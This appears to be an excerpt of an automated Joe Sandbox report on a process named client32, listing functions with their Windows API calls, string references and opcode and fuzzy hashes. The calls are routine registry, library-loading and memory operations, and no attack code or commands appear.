Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DriveType
String ID: ?:\
API String ID: 338552980-2533537817
Opcode ID: 7d105d5d3264686d78cdf600d1dbc63e035611bd93bacff97ebf5262afd1c0b3
Instruction ID: d8c01f969ecf2c29a93709725c3449b70f9be736d4b520bc1f9c87181eda743e
Opcode Fuzzy Hash: 7d105d5d3264686d78cdf600d1dbc63e035611bd93bacff97ebf5262afd1c0b3
Instruction Fuzzy Hash: E4F0B460C043D63AEB22CE60A84858ABFD85F06368F54C8DEDCD847541E175E58887D1

Function 110EAE40 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON

Download Yara Rule

APIs

Part of subcall function 110EAE00: RegCloseKey.KERNEL32(?,00000000,?,110EAE4D,00000000,00000000,?,?,1102FF05,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110EAE0D

RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,00000000,00000000,?,?,1102FF05,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110EAE5C

Part of subcall function 110EABE0: wvsprintfA.USER32(?,00020019,?), ref: 110EAC0B

Strings

Error %d Opening regkey %s, xrefs: 110EAE6A

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenwvsprintf
String ID: Error %d Opening regkey %s
API String ID: 1772833024-3994271378
Opcode ID: 53e9fb253a4287a341c73d02f727563da9f9b6b721f03677b0c3a90dab78a470
Instruction ID: 4d89cd16a1625618031adfcaa25819016af2246adc29496c5a5b5e28358148cc
Opcode Fuzzy Hash: 53e9fb253a4287a341c73d02f727563da9f9b6b721f03677b0c3a90dab78a470
Instruction Fuzzy Hash: FFE0927A6012197FD610D61A9C84FEBBB9EDBC97A5F014026FA0487301D971DC4082B0

Function 110EAE00 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(?,00000000,?,110EAE4D,00000000,00000000,?,?,1102FF05,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110EAE0D

Part of subcall function 110EABE0: wvsprintfA.USER32(?,00020019,?), ref: 110EAC0B

Strings

Error %d closing regkey %x, xrefs: 110EAE1D

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Closewvsprintf
String ID: Error %d closing regkey %x
API String ID: 843752472-892920262
Opcode ID: bf2cb42bd1d4fec1ce861f8694e72a294b6657dfff79836fab25dd89d3f690cf
Instruction ID: bd179f7716da66a3807671a10f2348160800437e138971cde355680c42375fa2
Opcode Fuzzy Hash: bf2cb42bd1d4fec1ce861f8694e72a294b6657dfff79836fab25dd89d3f690cf
Instruction Fuzzy Hash: 30E08675A021529FD7359A1EAC14F57BAD98FC8310F12446DB941C3300DA60C8418661

Function 11142710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSMTRACE,?,1102D8B4,11026190,023CB808,?,?,?,00000100,?,?,00000009), ref: 11142729

Part of subcall function 11141A40: GetModuleHandleA.KERNEL32(NSMTRACE,11190A88), ref: 11141A5A

Strings

NSMTRACE, xrefs: 11142724

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: NSMTRACE
API String ID: 4133054770-4175627554
Opcode ID: 8beb4f556fec5ca0009409a56a41a7e1414e5d19b01f190c2086f714a11354c4
Instruction ID: 71c80b7cce2516af000ccf1821517937791f77bfdcac948dd18e5afb39fc50bc
Opcode Fuzzy Hash: 8beb4f556fec5ca0009409a56a41a7e1414e5d19b01f190c2086f714a11354c4
Instruction Fuzzy Hash: 41D05E31281A37CBDB079FEAA4A61B9F7E8B70460E3140075DA26C2B04EB70E0408B79

Function 11025980 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,1102FC64), ref: 11025988

Strings

psapi.dll, xrefs: 11025981

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
Instruction ID: e7d689bb3e0256121f65424e75b73c3f9b38c7483ec2d975ead7d22227fa1e2d
Opcode Fuzzy Hash: dad11223205508537e44fd2c16bfa07601dbeeaf6f3e83892d3386c1115941cb
Instruction Fuzzy Hash: 7DE009B1A01B118FC3B0CF3A9544646BAF0BB186103118A3ED0AEC3A00E330A5448F90

Function 6C3C4F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,6C3C8DC8), ref: 6C3C4F78

Strings

psapi.dll, xrefs: 6C3C4F71

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: e9e3198027ad2bd2d3a3b04bb621ea0bc9d3dec26f2cbd83e236c48ac3c1abdd
Instruction ID: cdd3cda1ae2c2b86cc9c91c2a81641bea2b80316ceddf4eb57adce19b02860d7
Opcode Fuzzy Hash: e9e3198027ad2bd2d3a3b04bb621ea0bc9d3dec26f2cbd83e236c48ac3c1abdd
Instruction Fuzzy Hash: CBE001B1A01B508F83B0DF3AA504A42BAF0BB086503118E3E919EC3A00E370A5858F80

Function 11015190 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102E930,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1101519E

Strings

nslsp.dll, xrefs: 11015193

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: nslsp.dll
API String ID: 1029625771-3933918195
Opcode ID: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
Instruction ID: 0f85fd80076d2b40817f9a73906c67b3183ec9e0361306ecdf77c2e20fb6d995
Opcode Fuzzy Hash: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
Instruction Fuzzy Hash: 9AC092B57022368FE3645F98AC585C6FBE4EB09612351886EE5B6D3704E6F09C408BE2

Function 1105F240 Relevance: 3.2, APIs: 2, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

std::exception::exception.LIBCMT ref: 1105F2E3
__CxxThrowException@8.LIBCMT ref: 1105F2F8

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID:
API String ID: 1338273076-0
Opcode ID: 0e2708137e7841a047f0bf711e132c29747f48898e4f83a7bcb8bcbbdfe207f3
Instruction ID: 27c1c6abb081d98236a55b9714def59ee0ae50ea33d11c9255898d7f6f2dc0b9
Opcode Fuzzy Hash: 0e2708137e7841a047f0bf711e132c29747f48898e4f83a7bcb8bcbbdfe207f3
Instruction Fuzzy Hash: CD518DB6A00249AFDB50CF58D880E9AF7F9EB88214F04C56EEC599B341D775F901C7A1

Function 11073EE0 Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11073F3F
FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11073FA9

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FreeLibrary_memset
String ID:
API String ID: 1654520187-0
Opcode ID: 1de555015f75479fffabe6315b5e279a761057817db2cde32174c8189ffb5fcd
Instruction ID: 362c13a412c0e640e577dbbcd916c07cf33f0139573dcaf60f70c23bb96cce57
Opcode Fuzzy Hash: 1de555015f75479fffabe6315b5e279a761057817db2cde32174c8189ffb5fcd
Instruction Fuzzy Hash: 8421D376E04228A7D710DE98DC45BEFFBBCEB44360F4041AAE9099B100D7359A51CBE1

Function 6C3C3100 Relevance: 3.1, APIs: 2, Instructions: 72COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 6C3C3164
_memmove.LIBCMT ref: 6C3C3178

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: _calloc_memmove
String ID:
API String ID: 2366194613-0
Opcode ID: 21469f7755f7c8aeb813e7a3b6ae502103b9b8568096d6290a585443da012012
Instruction ID: efb719343a383e149d7ab91ccadb0e74bf8e0bb74ebc32d992225ec1939ba9d9
Opcode Fuzzy Hash: 21469f7755f7c8aeb813e7a3b6ae502103b9b8568096d6290a585443da012012
Instruction Fuzzy Hash: 082193B6A10509ABDB00DF54CC41BDFB7B8EF44624F104229E925D3790DB35AD15CBE1

Function 1105E340 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1105E386
_memmove.LIBCMT ref: 1105E391

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _malloc_memmove
String ID:
API String ID: 1183979061-0
Opcode ID: 16bbc3b8a626d0655bbde18434e07e0b0efb0c177530dcb6ca80941cbffc0494
Instruction ID: a0c66a39c0b70d1204c03aacb6c31f63effe2aa25bbbc6b932c0e1366d1e8000
Opcode Fuzzy Hash: 16bbc3b8a626d0655bbde18434e07e0b0efb0c177530dcb6ca80941cbffc0494
Instruction Fuzzy Hash: BFF0C8B9E002626F9741CF2D98448ABFBECDF9B158304C4E6E995CB312D631ED058BE0

Function 110874D0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110874EF
InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,1106FB03,00000000,00000000,1117E56E,000000FF), ref: 11087560

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection_memset
String ID:
API String ID: 453477542-0
Opcode ID: 84f1d00e1da4f556c6d29effd6eb789db6954938ff46dd922089048d4a5e5e0e
Instruction ID: efa4b2f5def9497acc6a730926d4f51879cfe16a6345f79810d85772ddd28013
Opcode Fuzzy Hash: 84f1d00e1da4f556c6d29effd6eb789db6954938ff46dd922089048d4a5e5e0e
Instruction Fuzzy Hash: A61157B0901B148FC3A4CF7A89816C7FAE5BB58315F90892E96EEC2200DB716564CF94

Function 111407E0 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11140801
ExtractIconExA.SHELL32(?,00000000,0008030B,000803F1,00000001), ref: 11140838

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExtractFileIconModuleName
String ID:
API String ID: 3911389742-0
Opcode ID: d353acd8377cc5718faa45abf7dc192d23559f5d1da3fbe3a47e20bf1bd0ba33
Instruction ID: 6ec026547e9d858e25107bae19a5eabb6ebc4b509078f5a81af6a55fc443eb8c
Opcode Fuzzy Hash: d353acd8377cc5718faa45abf7dc192d23559f5d1da3fbe3a47e20bf1bd0ba33
Instruction Fuzzy Hash: C5F0247CA4511C9FE748CFE0CC82FBDF769E785708F408269EA12861C4CD7029488780

Function 11160445 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE

